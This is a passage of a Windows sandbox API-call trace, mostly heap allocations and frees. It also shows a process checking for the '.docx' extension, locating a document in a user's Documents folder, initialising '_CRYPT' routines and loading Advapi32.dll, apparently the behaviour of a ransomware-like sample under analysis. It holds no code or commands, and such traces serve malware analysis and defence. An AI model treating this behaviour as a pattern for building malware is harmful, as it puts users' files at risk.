RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.053] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.054] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.054] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.055] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.056] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.056] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.057] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.057] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af608 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af538 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.060] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x68a94680, ftLastWriteTime.dwHighDateTime=0x1d5b5e5, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0x7c2240 [0037.060] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.060] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.060] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.060] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.060] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.060] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.061] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.061] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.061] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.061] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.061] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.061] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.061] PeekMessageW (in: 